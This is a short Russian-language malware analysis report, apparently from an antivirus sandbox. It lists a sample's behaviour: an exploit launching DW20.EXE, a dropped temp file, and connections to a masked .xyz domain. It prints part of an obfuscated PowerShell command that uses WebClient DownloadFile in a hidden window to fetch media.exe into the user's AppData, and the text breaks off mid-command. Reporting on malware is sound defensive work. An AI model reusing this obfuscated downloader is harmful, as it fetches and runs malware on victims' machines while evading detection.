Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1496
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\798647.cvr
Сетевая активность
Подключается к
- 'em####visioninc.xyz':80
UDP
- DNS ASK em####visioninc.xyz
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $MMMMMM='C:\Users\'+ $env:UserNaMe +'\AppData\media.exe';((n`e`W`-obj`e`c`T (('N'+'e'+'t'+'.'+'W'+'e'+'b'+'c'+'l'+'i'+'e'+'n'+'t'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'F'+'i'+'l'+'e')).invoke((...' (со скрытым окном)
